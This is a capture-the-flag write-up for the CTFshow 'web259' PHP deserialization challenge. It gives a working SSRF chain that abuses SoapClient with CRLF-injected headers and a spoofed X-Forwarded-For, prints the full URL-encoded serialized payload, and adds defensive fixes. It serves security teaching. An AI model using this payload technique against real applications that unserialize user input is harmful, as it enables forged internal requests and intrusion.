CTFshow Deserialization web259
Contents
- Source code
- Approach
- Solution
- Summary
Source code
index.php:
```php
<?php
highlight_file(__FILE__);
$vip = unserialize($_GET['vip']);
//vip can get flag one key
$vip->getFlag();
```
Output when index.php is visited without the parameter:
```
Notice: Undefined index: vip in /var/www/html/index.php on line 6
Fatal error: Uncaught Error: Call to a member function getFlag() on bool in /var/www/html/index.php:8 Stack trace: #0 {main} thrown in /var/www/html/index.php on line 8
```
Hint: there is a flag.php page.
flag.php:
```php
$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff);
if($ip!=='127.0.0.1'){
    die('error');
}else{
    $token = $_POST['token'];
    if($token=='ctfshow'){
        file_put_contents('flag.txt',$flag);
    }
}
```
Approach
First look at index.php. The point being tested is deserialization of a PHP native class, so we need to find a suitable built-in PHP class.
Now look at flag.php. The goal is to deserialize a native class in index.php that sends a request to flag.php, so that flag.php writes the flag into flag.txt with file_put_contents. The request is sent with a built-in PHP class, SoapClient. This class has a __call magic method: when a method that does not exist on the object is called, __call() runs, and that is what lets us get our forged request headers sent.
Reference article: https://baijiahao.baidu.com/s?id=1709236552525677652&wfr=spider&for=pc
Native class SoapClient
```php
class SoapClient {
    /* Methods */
    public __construct(?string $wsdl, array $options = [])
    public __call(string $name, array $args): mixed
    public __doRequest(string $request, string $location, string $action, int $version, bool $oneWay = false): ?string
    public __getCookies(): array
    public __getFunctions(): ?array
    public __getLastRequest(): ?string
    public __getLastRequestHeaders(): ?string
    public __getLastResponse(): ?string
    public __getLastResponseHeaders(): ?string
    public __getTypes(): ?array
    public __setCookie(string $name, ?string $value = null): void
    public __setLocation(?string $location = null): ?string
    public __setSoapHeaders(SoapHeader|array|null $headers = null): bool
    public __soapCall(string $name, array $args, ?array $options = null, SoapHeader|array|null $inputHeaders = null, array &$outputHeaders = null): mixed
}
```
From this we can see that constructing a SoapClient object takes two parameters: the string $wsdl and the array $options.
For WSDL, see this article; here the value can simply be NULL:
https://blog.csdn.net/yhahaha_/article/details/93716263
$options carries the request headers we want to construct; uri and location must be set. We can build this locally. user_agent can be injected and must be lowercase.
In flag.php, $_SERVER['HTTP_X_FORWARDED_FOR'] is split on commas and array_pop is applied twice; the second popped value is assigned to $ip. If the POSTed token equals ctfshow, the value of $flag is written into flag.txt.
```php
<?php
$ua = "kradress\r\nX-Forwarded-For: 127.0.0.1,127.0.0.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 13\r\n\r\ntoken=ctfshow";
$client = new SoapClient(null, array('uri' => 'http://127.0.0.1/', 'location' => 'http://127.0.0.1/flag.php', 'user_agent' => $ua));
echo(urlencode(serialize($client)));
```
A few additional details:
Individual HTTP request headers are separated by a single \r\n, while the HTTP headers and the HTTP body are separated by two \r\n. This is the CRLF knowledge point; see this blog:
https://wooyun.js.org/drops/CRLF%20Injection%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90.html
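As an added example that is not part of the original writeup, the two defensive fixes that would close this chain: refusing to build arbitrary classes from the vip parameter, and not trusting a client-supplied X-Forwarded-For. Function names are my own, and the sample inputs are constructed.

```php
<?php
// Added example, not the challenge's code. Function names are assumed.

// 1. index.php: never let user input instantiate arbitrary classes.
//    allowed_classes => false turns every object in the payload into
//    __PHP_Incomplete_Class, so SoapClient (and its __call) is never built.
function safe_unserialize_vip(string $data)
{
    $vip = @unserialize($data, ['allowed_classes' => false]);
    if (!is_object($vip) || $vip instanceof __PHP_Incomplete_Class) {
        return null; // reject instead of calling ->getFlag() on it
    }
    return $vip;
}

// 2. flag.php: X-Forwarded-For is attacker-controlled text. Decide on the
//    peer address the server itself saw; only trust XFF when a reverse proxy
//    you control sets it, and then trust only the hop it appended.
function request_is_local(): bool
{
    return ($_SERVER['REMOTE_ADDR'] ?? '') === '127.0.0.1';
}

// 3. Any value that ends up inside an outgoing header (user_agent here)
//    must not contain CR or LF; that is what lets a single option smuggle
//    extra headers and a body in the writeup's payload.
function header_value_is_clean(string $value): bool
{
    return preg_match('/[\r\n]/', $value) !== 1;
}

// Constructed sample inputs (not the real payload) to exercise the checks.
$serialized = 'O:10:"SoapClient":0:{}';
var_dump(safe_unserialize_vip($serialized));

$ua = "kradress\r\nX-Forwarded-For: 127.0.0.1,127.0.0.1";
var_dump(header_value_is_clean($ua));
var_dump(header_value_is_clean('Mozilla/5.0'));
var_dump(request_is_local());
```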
Solution
?vip=O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A132%3A%22kradress%0D%0AX-Forwarded-For%3A+127.0.0.1%2C127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+13%0D%0A%0D%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D
Summary
Learn a little every day.